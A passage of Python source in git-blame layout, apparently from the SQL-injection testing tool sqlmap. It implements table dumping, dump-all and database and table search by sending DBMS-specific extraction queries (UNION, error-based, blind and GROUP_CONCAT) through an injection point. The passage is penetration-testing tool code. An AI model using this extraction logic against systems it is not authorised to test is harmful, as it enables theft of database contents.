2011-05-08 06:08:18 +04:00
|
|
|
conf.db = safeSQLIdentificatorNaming(conf.db)
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2011-05-08 06:08:18 +04:00
|
|
|
if conf.tbl:
|
|
|
|
if Backend.isDbms(DBMS.ORACLE):
|
|
|
|
conf.tbl = conf.tbl.upper()
|
2011-01-10 13:30:17 +03:00
|
|
|
|
2011-05-08 06:08:18 +04:00
|
|
|
tblList = conf.tbl.split(",")
|
2010-12-27 14:36:36 +03:00
|
|
|
else:
|
2011-05-08 06:08:18 +04:00
|
|
|
self.getTables()
|
2010-12-18 01:23:01 +03:00
|
|
|
|
2011-05-08 06:08:18 +04:00
|
|
|
if len(kb.data.cachedTables) > 0:
|
|
|
|
tblList = kb.data.cachedTables.values()
|
2010-12-18 01:23:01 +03:00
|
|
|
|
2011-05-08 06:08:18 +04:00
|
|
|
if isinstance(tblList[0], (set, tuple, list)):
|
|
|
|
tblList = tblList[0]
|
|
|
|
else:
|
|
|
|
errMsg = "unable to retrieve the tables"
|
|
|
|
errMsg += "on database '%s'" % conf.db
|
|
|
|
raise sqlmapNoneDataException, errMsg
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2011-05-08 06:08:18 +04:00
|
|
|
for tbl in tblList:
|
|
|
|
tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl, True)
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2011-05-08 06:08:18 +04:00
|
|
|
for tbl in tblList:
|
|
|
|
conf.tbl = tbl
|
|
|
|
kb.data.cachedColumns = {}
|
|
|
|
kb.data.dumpedTable = {}
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2011-05-08 06:08:18 +04:00
|
|
|
self.getColumns(onlyColNames=True)
|
2011-02-15 03:28:27 +03:00
|
|
|
|
2011-05-08 06:08:18 +04:00
|
|
|
try:
|
|
|
|
if not unsafeSQLIdentificatorNaming(conf.db) in kb.data.cachedColumns \
|
|
|
|
or unsafeSQLIdentificatorNaming(tbl) not in \
|
2011-05-19 21:35:33 +04:00
|
|
|
kb.data.cachedColumns[unsafeSQLIdentificatorNaming(conf.db)] \
|
|
|
|
or not kb.data.cachedColumns[unsafeSQLIdentificatorNaming(conf.db)][unsafeSQLIdentificatorNaming(tbl)]:
|
2011-05-08 06:08:18 +04:00
|
|
|
warnMsg = "unable to enumerate the columns for table "
|
|
|
|
warnMsg += "'%s' on database" % unsafeSQLIdentificatorNaming(tbl)
|
|
|
|
warnMsg += " '%s', skipping" % unsafeSQLIdentificatorNaming(conf.db)
|
|
|
|
logger.warn(warnMsg)
|
2011-02-15 03:28:27 +03:00
|
|
|
|
2011-05-08 06:08:18 +04:00
|
|
|
continue
|
2011-02-15 03:28:27 +03:00
|
|
|
|
2011-05-08 06:08:18 +04:00
|
|
|
colList = kb.data.cachedColumns[unsafeSQLIdentificatorNaming(conf.db)][unsafeSQLIdentificatorNaming(tbl)].keys()
|
|
|
|
colString = ", ".join(column for column in colList)
|
|
|
|
rootQuery = queries[Backend.getIdentifiedDbms()].dump_table
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2011-05-08 06:08:18 +04:00
|
|
|
infoMsg = "fetching"
|
|
|
|
if conf.col:
|
2011-05-19 21:35:33 +04:00
|
|
|
infoMsg += " column(s) '%s'" % colString
|
2011-05-08 06:08:18 +04:00
|
|
|
infoMsg += " entries for table '%s'" % unsafeSQLIdentificatorNaming(tbl)
|
|
|
|
infoMsg += " on database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
|
|
|
|
logger.info(infoMsg)
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2011-05-08 06:08:18 +04:00
|
|
|
entriesCount = 0
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2011-05-08 06:08:18 +04:00
|
|
|
if any([isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION), isTechniqueAvailable(PAYLOAD.TECHNIQUE.ERROR), conf.direct]):
|
|
|
|
entries = []
|
|
|
|
query = None
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2011-05-08 06:08:18 +04:00
|
|
|
if all([Backend.isDbms(DBMS.MYSQL), isTechniqueAvailable(PAYLOAD.TECHNIQUE.ERROR), conf.groupConcat]):
|
|
|
|
randStr, randStr2 = randomStr(), randomStr()
|
|
|
|
filterFunction = "REPLACE(REPLACE(IFNULL(%s, ' '),'%s','%s'),'%s','%s')"\
|
|
|
|
% ('%s', CONCAT_VALUE_DELIMITER, randStr, CONCAT_ROW_DELIMITER, randStr2)
|
|
|
|
concats = ",".join(map(lambda x: "CONCAT(%s, '|')" % (filterFunction % x), colList[:-1]))
|
|
|
|
concats += ",%s" % (filterFunction % colList[-1])
|
|
|
|
query = "SELECT GROUP_CONCAT(%s) FROM %s.%s" % (concats, conf.db, tbl)
|
|
|
|
value = inject.getValue(query, blind=False)
|
|
|
|
if isinstance(value, basestring):
|
|
|
|
for line in value.split(CONCAT_ROW_DELIMITER):
|
|
|
|
row = line.split(CONCAT_VALUE_DELIMITER)
|
|
|
|
row = map(lambda x: x.replace(randStr, CONCAT_VALUE_DELIMITER).replace(randStr2, CONCAT_ROW_DELIMITER), row)
|
|
|
|
entries.append(row)
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2011-05-08 06:08:18 +04:00
|
|
|
if Backend.isDbms(DBMS.ORACLE):
|
|
|
|
query = rootQuery.inband.query % (colString, tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper())))
|
|
|
|
elif Backend.isDbms(DBMS.SQLITE):
|
|
|
|
query = rootQuery.inband.query % (colString, tbl)
|
|
|
|
elif Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MSSQL):
|
|
|
|
# Partial inband and error
|
2011-05-26 19:16:57 +04:00
|
|
|
if not (isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) and kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.ORIGINAL):
|
2011-05-08 06:08:18 +04:00
|
|
|
table = "%s.%s" % (conf.db, tbl)
|
2010-09-01 13:25:21 +04:00
|
|
|
|
2011-05-08 06:08:18 +04:00
|
|
|
retVal = self.__pivotDumpTable(table, colList, blind=False)
|
|
|
|
|
|
|
|
if retVal:
|
|
|
|
entries, _ = retVal
|
|
|
|
entries = zip(*[entries[colName] for colName in colList])
|
2010-05-07 17:40:57 +04:00
|
|
|
else:
|
2011-05-08 06:08:18 +04:00
|
|
|
query = rootQuery.inband.query % (colString, conf.db, tbl)
|
|
|
|
else:
|
|
|
|
query = rootQuery.inband.query % (colString, conf.db, tbl)
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2011-05-08 06:08:18 +04:00
|
|
|
if not entries and query:
|
|
|
|
entries = inject.getValue(query, blind=False, dump=True)
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2011-05-23 15:09:44 +04:00
|
|
|
if isNoneValue(entries):
|
|
|
|
entries = []
|
|
|
|
elif isinstance(entries, basestring):
|
|
|
|
entries = [ entries ]
|
|
|
|
elif not isinstance(entries, (list, tuple)):
|
|
|
|
entries = []
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2011-05-23 15:09:44 +04:00
|
|
|
entriesCount = len(entries)
|
|
|
|
index = 0
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2011-05-23 15:09:44 +04:00
|
|
|
for column in colList:
|
|
|
|
colLen = len(column)
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2011-05-23 15:09:44 +04:00
|
|
|
if not kb.data.dumpedTable.has_key(column):
|
|
|
|
kb.data.dumpedTable[column] = { "length": colLen, "values": [] }
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2011-05-23 15:09:44 +04:00
|
|
|
for entry in entries:
|
|
|
|
if entry is None or len(entry) == 0:
|
|
|
|
continue
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2011-05-23 15:09:44 +04:00
|
|
|
if isinstance(entry, basestring):
|
|
|
|
colEntry = entry
|
|
|
|
else:
|
|
|
|
colEntry = entry[index] if index < len(entry) else u''
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2011-05-23 15:09:44 +04:00
|
|
|
colEntryLen = len(getUnicode(colEntry))
|
|
|
|
maxLen = max(colLen, colEntryLen)
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2011-05-23 15:09:44 +04:00
|
|
|
if maxLen > kb.data.dumpedTable[column]["length"]:
|
|
|
|
kb.data.dumpedTable[column]["length"] = maxLen
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2011-05-23 15:09:44 +04:00
|
|
|
kb.data.dumpedTable[column]["values"].append(colEntry)
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2011-05-23 15:09:44 +04:00
|
|
|
index += 1
|
2011-05-08 06:08:18 +04:00
|
|
|
|
|
|
|
if not kb.data.dumpedTable and not conf.direct:
|
|
|
|
infoMsg = "fetching number of "
|
|
|
|
if conf.col:
|
2011-05-31 19:45:54 +04:00
|
|
|
infoMsg += "column(s) '%s' " % colString
|
2011-05-08 06:08:18 +04:00
|
|
|
infoMsg += "entries for table '%s' " % unsafeSQLIdentificatorNaming(tbl)
|
|
|
|
infoMsg += "on database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
|
|
|
|
logger.info(infoMsg)
|
|
|
|
|
|
|
|
if Backend.isDbms(DBMS.ORACLE):
|
|
|
|
query = rootQuery.blind.count % (tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper())))
|
|
|
|
elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD):
|
|
|
|
query = rootQuery.blind.count % tbl
|
2011-04-08 19:17:57 +04:00
|
|
|
elif Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MSSQL):
|
2011-05-08 06:08:18 +04:00
|
|
|
query = rootQuery.blind.count % ("%s.%s" % (conf.db, tbl))
|
2011-04-30 18:54:29 +04:00
|
|
|
elif Backend.isDbms(DBMS.MAXDB):
|
2011-05-08 06:08:18 +04:00
|
|
|
query = rootQuery.blind.count % tbl
|
|
|
|
else:
|
|
|
|
query = rootQuery.blind.count % (conf.db, tbl)
|
|
|
|
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=2)
|
2011-04-15 01:11:20 +04:00
|
|
|
|
2011-05-23 15:09:44 +04:00
|
|
|
lengths = {}
|
|
|
|
entries = {}
|
|
|
|
|
|
|
|
if count == "0":
|
|
|
|
warnMsg = "table '%s' " % unsafeSQLIdentificatorNaming(tbl)
|
|
|
|
warnMsg += "on database '%s' " % unsafeSQLIdentificatorNaming(conf.db)
|
|
|
|
warnMsg += "appears to be empty"
|
|
|
|
logger.warn(warnMsg)
|
|
|
|
|
|
|
|
for column in colList:
|
|
|
|
lengths[column] = len(column)
|
|
|
|
entries[column] = []
|
|
|
|
|
|
|
|
elif not isNumPosStrValue(count):
|
2011-05-08 06:08:18 +04:00
|
|
|
warnMsg = "unable to retrieve the number of "
|
|
|
|
if conf.col:
|
|
|
|
warnMsg += "columns '%s' " % colString
|
|
|
|
warnMsg += "entries for table '%s' " % unsafeSQLIdentificatorNaming(tbl)
|
|
|
|
warnMsg += "on database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
|
|
|
|
logger.warn(warnMsg)
|
|
|
|
|
|
|
|
continue
|
|
|
|
|
2011-05-23 15:09:44 +04:00
|
|
|
elif Backend.getIdentifiedDbms() in (DBMS.ACCESS, DBMS.SYBASE, DBMS.MAXDB, DBMS.MSSQL):
|
2011-05-08 06:08:18 +04:00
|
|
|
if Backend.isDbms(DBMS.ACCESS):
|
|
|
|
table = tbl
|
|
|
|
elif Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MSSQL):
|
|
|
|
table = "%s.%s" % (conf.db, tbl)
|
|
|
|
elif Backend.isDbms(DBMS.MAXDB):
|
|
|
|
table = "%s.%s" % (conf.db, tbl)
|
|
|
|
|
|
|
|
retVal = self.__pivotDumpTable(table, colList, count, blind=True)
|
|
|
|
if retVal:
|
|
|
|
entries, lengths = retVal
|
2011-01-01 15:41:51 +03:00
|
|
|
|
2011-02-19 12:36:57 +03:00
|
|
|
else:
|
2011-05-08 06:08:18 +04:00
|
|
|
if Backend.isDbms(DBMS.ORACLE):
|
|
|
|
plusOne = True
|
|
|
|
else:
|
|
|
|
plusOne = False
|
|
|
|
indexRange = getRange(count, dump=True, plusOne=plusOne)
|
2011-02-19 12:36:57 +03:00
|
|
|
|
2011-05-08 06:08:18 +04:00
|
|
|
for index in indexRange:
|
|
|
|
for column in colList:
|
|
|
|
if column not in lengths:
|
|
|
|
lengths[column] = 0
|
|
|
|
|
|
|
|
if column not in entries:
|
|
|
|
entries[column] = []
|
|
|
|
|
|
|
|
if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
|
|
|
|
query = rootQuery.blind.query % (column, conf.db,
|
|
|
|
conf.tbl, index)
|
|
|
|
elif Backend.isDbms(DBMS.ORACLE):
|
|
|
|
query = rootQuery.blind.query % (column, column,
|
|
|
|
tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper())),
|
|
|
|
index)
|
|
|
|
elif Backend.isDbms(DBMS.SQLITE):
|
|
|
|
query = rootQuery.blind.query % (column, tbl, index)
|
|
|
|
|
|
|
|
elif Backend.isDbms(DBMS.FIREBIRD):
|
|
|
|
query = rootQuery.blind.query % (index, column, tbl)
|
|
|
|
|
|
|
|
value = inject.getValue(query, inband=False, error=False, dump=True)
|
2011-01-01 15:41:51 +03:00
|
|
|
|
2011-05-08 06:08:18 +04:00
|
|
|
lengths[column] = max(lengths[column], len(value) if value else 0)
|
|
|
|
entries[column].append(value)
|
2011-01-01 15:41:51 +03:00
|
|
|
|
2011-05-08 06:08:18 +04:00
|
|
|
for column, columnEntries in entries.items():
|
|
|
|
length = max(lengths[column], len(column))
|
2011-01-01 15:41:51 +03:00
|
|
|
|
2011-05-08 06:08:18 +04:00
|
|
|
kb.data.dumpedTable[column] = { "length": length,
|
|
|
|
"values": columnEntries }
|
2011-01-01 15:41:51 +03:00
|
|
|
|
2011-05-08 06:08:18 +04:00
|
|
|
entriesCount = len(columnEntries)
|
|
|
|
|
|
|
|
if len(kb.data.dumpedTable) > 0:
|
|
|
|
kb.data.dumpedTable["__infos__"] = { "count": entriesCount,
|
|
|
|
"table": unsafeSQLIdentificatorNaming(tbl),
|
|
|
|
"db": unsafeSQLIdentificatorNaming(conf.db) }
|
|
|
|
|
2011-05-10 19:48:48 +04:00
|
|
|
attackDumpedTable()
|
2011-05-08 06:08:18 +04:00
|
|
|
conf.dumper.dbTableValues(kb.data.dumpedTable)
|
|
|
|
else:
|
|
|
|
warnMsg = "unable to retrieve the entries of "
|
|
|
|
if conf.col:
|
|
|
|
warnMsg += "columns '%s' " % colString
|
|
|
|
warnMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl)
|
|
|
|
warnMsg += "on database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
|
|
|
|
logger.warn(warnMsg)
|
2011-01-01 15:41:51 +03:00
|
|
|
|
|
|
|
except KeyboardInterrupt:
|
|
|
|
warnMsg = "Ctrl+C detected in dumping phase"
|
|
|
|
logger.warn(warnMsg)
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2011-01-04 16:23:59 +03:00
|
|
|
except sqlmapConnectionException, e:
|
|
|
|
errMsg = "connection exception detected in dumping phase: "
|
|
|
|
errMsg += "'%s'" % e
|
|
|
|
logger.critical(errMsg)
|
|
|
|
|
2010-05-07 17:40:57 +04:00
|
|
|
def dumpAll(self):
|
2011-05-08 06:08:18 +04:00
|
|
|
if conf.db is not None and conf.tbl is None:
|
|
|
|
self.dumpTable()
|
|
|
|
return
|
|
|
|
|
2011-04-30 18:54:29 +04:00
|
|
|
if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
|
2011-04-30 17:20:05 +04:00
|
|
|
errMsg = "information_schema not available, "
|
2010-01-09 03:05:00 +03:00
|
|
|
errMsg += "back-end DBMS is MySQL < 5.0"
|
|
|
|
raise sqlmapUnsupportedFeatureException, errMsg
|
|
|
|
|
2011-05-08 06:08:18 +04:00
|
|
|
infoMsg = "sqlmap will dump entries of all databases' tables now"
|
|
|
|
logger.info(infoMsg)
|
2011-04-08 02:08:10 +04:00
|
|
|
|
2011-04-30 17:20:05 +04:00
|
|
|
conf.tbl = None
|
|
|
|
conf.col = None
|
2011-05-08 06:08:18 +04:00
|
|
|
|
2011-04-30 19:29:19 +04:00
|
|
|
self.getTables()
|
2010-12-21 13:31:56 +03:00
|
|
|
|
2010-11-05 01:00:14 +03:00
|
|
|
if kb.data.cachedTables:
|
|
|
|
if isinstance(kb.data.cachedTables, list):
|
|
|
|
kb.data.cachedTables = { None : kb.data.cachedTables }
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2010-11-05 01:00:14 +03:00
|
|
|
for db, tables in kb.data.cachedTables.items():
|
|
|
|
conf.db = db
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2010-11-05 01:00:14 +03:00
|
|
|
for table in tables:
|
2011-04-15 00:56:12 +04:00
|
|
|
try:
|
|
|
|
conf.tbl = table
|
|
|
|
kb.data.cachedColumns = {}
|
|
|
|
kb.data.dumpedTable = {}
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2011-05-08 14:25:40 +04:00
|
|
|
self.dumpTable()
|
2011-04-15 00:56:12 +04:00
|
|
|
except sqlmapNoneDataException:
|
|
|
|
infoMsg = "skipping table '%s'" % table
|
|
|
|
logger.info(infoMsg)
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2010-05-17 20:16:49 +04:00
|
|
|
def dumpFoundColumn(self, dbs, foundCols, colConsider):
|
|
|
|
if not dbs:
|
|
|
|
warnMsg = "no databases have tables containing any of the "
|
|
|
|
warnMsg += "provided columns"
|
|
|
|
logger.warn(warnMsg)
|
|
|
|
return
|
|
|
|
|
2010-05-28 20:43:04 +04:00
|
|
|
conf.dumper.dbColumns(foundCols, colConsider, dbs)
|
2010-05-17 20:16:49 +04:00
|
|
|
|
|
|
|
message = "do you want to dump entries? [Y/n] "
|
|
|
|
output = readInput(message, default="Y")
|
|
|
|
|
|
|
|
if output and output[0] not in ("y", "Y"):
|
|
|
|
return
|
|
|
|
|
|
|
|
dumpFromDbs = []
|
|
|
|
message = "which database(s)?\n[a]ll (default)\n"
|
|
|
|
|
|
|
|
for db, tblData in dbs.items():
|
|
|
|
if tblData:
|
|
|
|
message += "[%s]\n" % db
|
|
|
|
|
|
|
|
message += "[q]uit"
|
|
|
|
test = readInput(message, default="a")
|
|
|
|
|
|
|
|
if not test or test in ("a", "A"):
|
|
|
|
dumpFromDbs = dbs.keys()
|
|
|
|
elif test in ("q", "Q"):
|
|
|
|
return
|
|
|
|
else:
|
|
|
|
dumpFromDbs = test.replace(" ", "").split(",")
|
|
|
|
|
|
|
|
for db, tblData in dbs.items():
|
|
|
|
if db not in dumpFromDbs or not tblData:
|
|
|
|
continue
|
|
|
|
|
|
|
|
conf.db = db
|
|
|
|
dumpFromTbls = []
|
|
|
|
message = "which table(s) of database '%s'?\n" % db
|
|
|
|
message += "[a]ll (default)\n"
|
|
|
|
|
|
|
|
for tbl in tblData:
|
|
|
|
message += "[%s]\n" % tbl
|
|
|
|
|
|
|
|
message += "[s]kip\n"
|
|
|
|
message += "[q]uit"
|
|
|
|
test = readInput(message, default="a")
|
|
|
|
|
|
|
|
if not test or test in ("a", "A"):
|
|
|
|
dumpFromTbls = tblData
|
|
|
|
elif test in ("s", "S"):
|
|
|
|
continue
|
|
|
|
elif test in ("q", "Q"):
|
|
|
|
return
|
|
|
|
else:
|
|
|
|
dumpFromTbls = test.replace(" ", "").split(",")
|
|
|
|
|
|
|
|
for table, columns in tblData.items():
|
|
|
|
if table not in dumpFromTbls:
|
|
|
|
continue
|
|
|
|
|
|
|
|
conf.tbl = table
|
|
|
|
conf.col = ",".join(column for column in columns)
|
|
|
|
kb.data.cachedColumns = {}
|
|
|
|
kb.data.dumpedTable = {}
|
|
|
|
|
|
|
|
data = self.dumpTable()
|
|
|
|
|
|
|
|
if data:
|
2010-05-28 20:43:04 +04:00
|
|
|
conf.dumper.dbTableValues(data)
|
2010-05-17 20:16:49 +04:00
|
|
|
|
2010-05-07 17:40:57 +04:00
|
|
|
def searchDb(self):
|
|
|
|
foundDbs = []
|
2011-01-28 19:36:09 +03:00
|
|
|
rootQuery = queries[Backend.getIdentifiedDbms()].search_db
|
2010-05-07 17:40:57 +04:00
|
|
|
dbList = conf.db.split(",")
|
|
|
|
|
2011-04-30 18:54:29 +04:00
|
|
|
if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
|
2010-10-21 17:13:12 +04:00
|
|
|
dbCond = rootQuery.inband.condition2
|
2010-05-07 17:40:57 +04:00
|
|
|
else:
|
2010-10-21 17:13:12 +04:00
|
|
|
dbCond = rootQuery.inband.condition
|
2010-05-07 17:40:57 +04:00
|
|
|
|
|
|
|
dbConsider, dbCondParam = self.likeOrExact("database")
|
|
|
|
|
|
|
|
for db in dbList:
|
2011-03-30 01:54:15 +04:00
|
|
|
db = safeSQLIdentificatorNaming(db)
|
2011-03-28 15:01:55 +04:00
|
|
|
|
2010-05-07 17:40:57 +04:00
|
|
|
infoMsg = "searching database"
|
|
|
|
if dbConsider == "1":
|
|
|
|
infoMsg += "s like"
|
2011-03-30 01:54:15 +04:00
|
|
|
infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(db)
|
2010-05-07 17:40:57 +04:00
|
|
|
logger.info(infoMsg)
|
|
|
|
|
|
|
|
if conf.excludeSysDbs:
|
2011-03-30 01:54:15 +04:00
|
|
|
exclDbsQuery = "".join(" AND '%s' != %s" % (unsafeSQLIdentificatorNaming(db), dbCond) for db in self.excludeDbsList)
|
2011-04-30 19:29:19 +04:00
|
|
|
infoMsg = "skipping system database%s: %s" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(db for db in self.excludeDbsList))
|
2010-05-07 17:40:57 +04:00
|
|
|
logger.info(infoMsg)
|
|
|
|
else:
|
|
|
|
exclDbsQuery = ""
|
|
|
|
|
|
|
|
dbQuery = "%s%s" % (dbCond, dbCondParam)
|
2011-03-30 01:54:15 +04:00
|
|
|
dbQuery = dbQuery % unsafeSQLIdentificatorNaming(db)
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2011-01-19 02:02:11 +03:00
|
|
|
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) or isTechniqueAvailable(PAYLOAD.TECHNIQUE.ERROR) or conf.direct:
|
2011-04-30 18:54:29 +04:00
|
|
|
if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
|
2010-10-21 17:13:12 +04:00
|
|
|
query = rootQuery.inband.query2
|
2010-05-07 17:40:57 +04:00
|
|
|
else:
|
2010-10-21 17:13:12 +04:00
|
|
|
query = rootQuery.inband.query
|
2010-05-07 17:40:57 +04:00
|
|
|
query += dbQuery
|
|
|
|
query += exclDbsQuery
|
2011-01-19 02:02:11 +03:00
|
|
|
values = inject.getValue(query, blind=False)
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2011-05-26 12:17:21 +04:00
|
|
|
if not isNoneValue(values):
|
2010-05-25 14:09:35 +04:00
|
|
|
if isinstance(values, basestring):
|
2010-05-07 17:40:57 +04:00
|
|
|
values = [ values ]
|
|
|
|
|
|
|
|
for value in values:
|
2011-03-30 01:54:15 +04:00
|
|
|
value = safeSQLIdentificatorNaming(value)
|
2010-05-07 17:40:57 +04:00
|
|
|
foundDbs.append(value)
|
|
|
|
else:
|
|
|
|
infoMsg = "fetching number of databases"
|
|
|
|
if dbConsider == "1":
|
|
|
|
infoMsg += "s like"
|
2011-03-30 01:54:15 +04:00
|
|
|
infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(db)
|
2010-05-07 17:40:57 +04:00
|
|
|
logger.info(infoMsg)
|
|
|
|
|
2011-04-30 18:54:29 +04:00
|
|
|
if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
|
2010-10-21 17:13:12 +04:00
|
|
|
query = rootQuery.blind.count2
|
2010-05-07 17:40:57 +04:00
|
|
|
else:
|
2010-10-21 17:13:12 +04:00
|
|
|
query = rootQuery.blind.count
|
2010-05-07 17:40:57 +04:00
|
|
|
query += dbQuery
|
|
|
|
query += exclDbsQuery
|
2011-01-19 02:02:11 +03:00
|
|
|
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=2)
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2010-12-02 21:57:43 +03:00
|
|
|
if not isNumPosStrValue(count):
|
2011-04-30 17:20:05 +04:00
|
|
|
warnMsg = "no database"
|
2010-05-07 17:40:57 +04:00
|
|
|
if dbConsider == "1":
|
|
|
|
warnMsg += "s like"
|
2011-03-30 01:54:15 +04:00
|
|
|
warnMsg += " '%s' found" % unsafeSQLIdentificatorNaming(db)
|
2010-05-07 17:40:57 +04:00
|
|
|
logger.warn(warnMsg)
|
|
|
|
|
|
|
|
continue
|
|
|
|
|
|
|
|
indexRange = getRange(count)
|
|
|
|
|
|
|
|
for index in indexRange:
|
2011-04-30 18:54:29 +04:00
|
|
|
if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
|
2010-10-21 17:13:12 +04:00
|
|
|
query = rootQuery.blind.query2
|
2010-05-07 17:40:57 +04:00
|
|
|
else:
|
2010-10-21 17:13:12 +04:00
|
|
|
query = rootQuery.blind.query
|
2010-05-07 17:40:57 +04:00
|
|
|
query += dbQuery
|
|
|
|
query += exclDbsQuery
|
|
|
|
query = agent.limitQuery(index, query, dbCond)
|
|
|
|
|
2011-03-28 15:01:55 +04:00
|
|
|
value = inject.getValue(query, inband=False, error=False)
|
2011-03-30 01:54:15 +04:00
|
|
|
value = safeSQLIdentificatorNaming(value)
|
2011-03-28 15:01:55 +04:00
|
|
|
foundDbs.append(value)
|
2010-05-07 17:40:57 +04:00
|
|
|
|
|
|
|
return foundDbs
|
|
|
|
|
|
|
|
def searchTable(self):
|
2010-12-27 02:50:16 +03:00
|
|
|
bruteForce = False
|
|
|
|
|
2011-04-30 18:54:29 +04:00
|
|
|
if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
|
2011-04-30 17:20:05 +04:00
|
|
|
errMsg = "information_schema not available, "
|
2010-05-17 00:46:17 +04:00
|
|
|
errMsg += "back-end DBMS is MySQL < 5.0"
|
2010-12-27 02:50:16 +03:00
|
|
|
bruteForce = True
|
|
|
|
|
2011-04-30 18:54:29 +04:00
|
|
|
elif Backend.isDbms(DBMS.ACCESS):
|
2011-04-30 17:20:05 +04:00
|
|
|
errMsg = "cannot retrieve table names, "
|
2010-12-27 02:50:16 +03:00
|
|
|
errMsg += "back-end DBMS is Access"
|
|
|
|
logger.error(errMsg)
|
|
|
|
bruteForce = True
|
|
|
|
|
|
|
|
if bruteForce:
|
2011-05-22 12:24:13 +04:00
|
|
|
message = "do you want to use common table existence check? [Y/n/q]"
|
2010-12-27 02:50:16 +03:00
|
|
|
test = readInput(message, default="Y")
|
|
|
|
|
|
|
|
if test[0] in ("n", "N"):
|
|
|
|
return
|
|
|
|
elif test[0] in ("q", "Q"):
|
|
|
|
raise sqlmapUserQuitException
|
|
|
|
else:
|
|
|
|
regex = "|".join(conf.tbl.split(","))
|
|
|
|
return tableExists(paths.COMMON_TABLES, regex)
|
2010-05-17 00:46:17 +04:00
|
|
|
|
2011-01-28 19:36:09 +03:00
|
|
|
rootQuery = queries[Backend.getIdentifiedDbms()].search_table
|
2010-05-17 00:46:17 +04:00
|
|
|
foundTbls = {}
|
|
|
|
tblList = conf.tbl.split(",")
|
2010-10-21 17:13:12 +04:00
|
|
|
tblCond = rootQuery.inband.condition
|
|
|
|
dbCond = rootQuery.inband.condition2
|
2010-05-17 00:46:17 +04:00
|
|
|
|
|
|
|
tblConsider, tblCondParam = self.likeOrExact("table")
|
|
|
|
|
|
|
|
for tbl in tblList:
|
2011-03-30 01:54:15 +04:00
|
|
|
tbl = safeSQLIdentificatorNaming(tbl, True)
|
2011-03-28 15:01:55 +04:00
|
|
|
|
2011-05-06 14:27:43 +04:00
|
|
|
if Backend.isDbms(DBMS.ORACLE):
|
2010-05-17 00:46:17 +04:00
|
|
|
tbl = tbl.upper()
|
|
|
|
|
|
|
|
infoMsg = "searching table"
|
|
|
|
if tblConsider == "1":
|
|
|
|
infoMsg += "s like"
|
2011-03-30 01:54:15 +04:00
|
|
|
infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl)
|
2010-05-17 00:46:17 +04:00
|
|
|
logger.info(infoMsg)
|
|
|
|
|
|
|
|
if conf.excludeSysDbs:
|
2011-03-30 01:54:15 +04:00
|
|
|
exclDbsQuery = "".join(" AND '%s' != %s" % (unsafeSQLIdentificatorNaming(db), dbCond) for db in self.excludeDbsList)
|
2011-04-30 19:29:19 +04:00
|
|
|
infoMsg = "skipping system database%s: %s" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(db for db in self.excludeDbsList))
|
2010-05-17 00:46:17 +04:00
|
|
|
logger.info(infoMsg)
|
|
|
|
else:
|
|
|
|
exclDbsQuery = ""
|
|
|
|
|
|
|
|
tblQuery = "%s%s" % (tblCond, tblCondParam)
|
|
|
|
tblQuery = tblQuery % tbl
|
|
|
|
|
2011-01-19 02:02:11 +03:00
|
|
|
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) or isTechniqueAvailable(PAYLOAD.TECHNIQUE.ERROR) or conf.direct:
|
2010-10-21 17:13:12 +04:00
|
|
|
query = rootQuery.inband.query
|
2010-05-17 00:46:17 +04:00
|
